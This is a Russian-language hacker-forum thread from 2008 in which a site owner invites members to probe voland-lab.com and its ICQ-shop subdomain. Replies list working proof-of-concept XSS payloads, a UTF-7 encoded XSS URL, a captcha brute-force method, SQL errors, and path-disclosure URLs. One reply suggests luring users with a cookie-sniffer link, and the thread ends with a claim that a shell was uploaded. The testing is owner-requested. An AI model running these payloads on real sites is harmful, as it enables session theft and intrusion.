Просмотр полной версии : www.voland-lab.com
[x26]VOLAND
19.04.2008, 16:02
Прошу проверить.
http://www.voland-lab.com/
Каждому нашедшему уязвимость/недочёт +5
создаём картинку в гостевой, там пишем: "http://images.google.com.ua/intl/ru_ALL/images/images_hp.gif'><script>alert(document.cookie)</script>"
и наблюдаем свои куки.
это каэш увидит только тот кто написал.... но всёравно некрасиво
ну и вход в админку http://www.voland-lab.com/?page=login&redirect=admin
а так больше ничё ненашел...
капчу еле видно в гостевой, + спс мыльников собрал немного
http://icqshop.voland-lab.com/?page=users
Query was empty
http://icqshop.voland-lab.com/?page=faq
http://icqshop.voland-lab.com/index.ph/?page=faq
No such page found!
Make sure you using correct link.
http://icqshop.voland-lab.com/?page=reg
Query was empty
Где "ТАМ"? Уточни код.
нажимаем на кнопку добавления картинки. в появившеся окне пишем "http://images.google.com.ua/intl/ru_ALL/images/images_hp.gif'><script>alert(document.cookie)</script>"
big_BRAT
20.04.2008, 14:26
http://www.voland-lab.com/?page=mods&game=doom3--
Query error!
но раскрутить как я понимаю не возможно.
Наверно опять проблемы хостера...
если зайти в http://voland-lab.com/webmail и попробовать залогиниться, то
ERROR (2): fsockopen() [function.fsockopen]: unable to connect to localhost:110 (Connection refused) (/var/www/html/webmail/inc/class.uebimiau_mail.php:80)
А это не должно быть скрыто?
http://voland-lab.com/stats/
Стандартная апачевая дира открыта:
http://voland-lab.com/icons/
Реальная угроза этой уязвимости равна 0. При постинге (и даже выводе) всё тщательно фильтруется.
да. но что нам мешает сказать кому-то: "о! зацени прикол! создай там картинку с такой ссылкой: *http://длинная_ссылка_со_снифером* !!!"
Сделай ограничение по символам ато щас всю войну и мир затолкаю ))
фигня конечно- жамкаем вставить картинку и вставляем в поле адреса
></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>
http://i047.radikal.ru/0804/1e/f8bd9ff1e10ft.jpg (http://radikal.ru/F/i047.radikal.ru/0804/1e/f8bd9ff1e10f.png.html)
http://i033.radikal.ru/0804/cb/439194edb8a2t.jpg (http://radikal.ru/F/i033.radikal.ru/0804/cb/439194edb8a2.png.html)
В гостевухе строки не режутся, дизайн разъежается ппц куда
=============
Каптча не обновляется, с одной каптчи можно отправить бесконечное кол-во месаг
Но будь внимателен, надо фиксить и ?page=guestbook&mode=checkcode&code=
потомучто можно будет подбирать код, вызвваем http://www.voland-lab.com/?page=guestbook&mode=checkcode&code=<цифра от 2 до 18> когда скрипт вернёт true значит каптча правильная и можем отправлять месагу
активная xss в гостевухе уязвимы все поля...
В гостевухе строки не режутся, дизайн разъежается ппц куда
сори за гостевуху
lsass.exe
24.04.2008, 10:59
Раскрытие путей
http://www.voland-lab.com/?page[]=login&redirect=main
Warning: array_key_exists() [function.array-key-exists]: The first argument should be either a string or an integer in /home/voland213/domains/voland-lab.com/public_html/index.php on line 116
Warning: htmlentities() expects parameter 1 to be string, array given in /home/voland213/domains/voland-lab.com/public_html/index.php on line 261
http://www.voland-lab.com/?page=
можно в гостевуху писать пустые комменты, если сделать, к примеру, только фильтрующуюся ссылку с символами типа ", < и т.п.
http://icqshop.voland-lab.com/
)) поле "номер"
*active XSS
И ещё на странице http://icqshop.voland-lab.com/?page=users ссылки на номерки юзеров неправильные, id не передаётся.
XSS в ИЕ
http://icqshop.voland-lab.com/?page=%2BADw-script%2BAD4-alert%28%29%2BADw-%2Fscript%2BAD4-
берём <script>alert()</script> Т.к не указана точная кодировка страницы можно применять UTF-7
Но вот беда в нём присудствует знак +(если ввести в урл будет пробел) НО
кодируем в урл и получаем
%2BADw-script%2BAD4-alert%28%29%2BADw-%2Fscript%2BAD4-
удачи... научился этому у Flame of soul
http://icqshop.voland-lab.com/?page=user&id=2 - Ты в ссылке на страницу не указал страницу для какого ИД... нажимаю страница 2 а в УРл
http://icqshop.voland-lab.com/?page=user&pg=2
а надо
http://icqshop.voland-lab.com/?page=user&id=2&pg=2
ну и сасем хня:
В асе можно указать 0xF0
и скрипт это примет но будет выводить номер аси 0
[x26]VOLAND Ты так и не пошиксил тот XSS? ты не увидел мою мессагу?
http://forum.antichat.ru/showpost.php?p=668099&postcount=27
В IE
http://icqshop.voland-lab.com/?page=%2BADw-script%2BAD4-alert%28%29%2BADw-%2Fscript%2BAD4-
а!!! Активка в добавлении номера #2:
имя пользователя: <script>...
пароль: '1
номер: '1
Заходим на страницу продавцов...
brasco2k
19.05.2008, 17:12
В гостевой книге, email'ы юзеров надо скрывать. А то нихорошо както получается. Они пишут, спам боты собирают(.
В гостевой книге дизайн не продуман т.е можно ввести оч. длинную строку и мессадж боксы будут повторятся.
dotsenko
31.05.2008, 14:42
http://www.voland-lab.com/?page=main&mode=gbpost&pg=0.01
http://www.voland-lab.com/?page=main&mode=gbpost&l=eng&pg=0.01
;)
Не вандалил , просто шелл залил, сам просил потестить.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot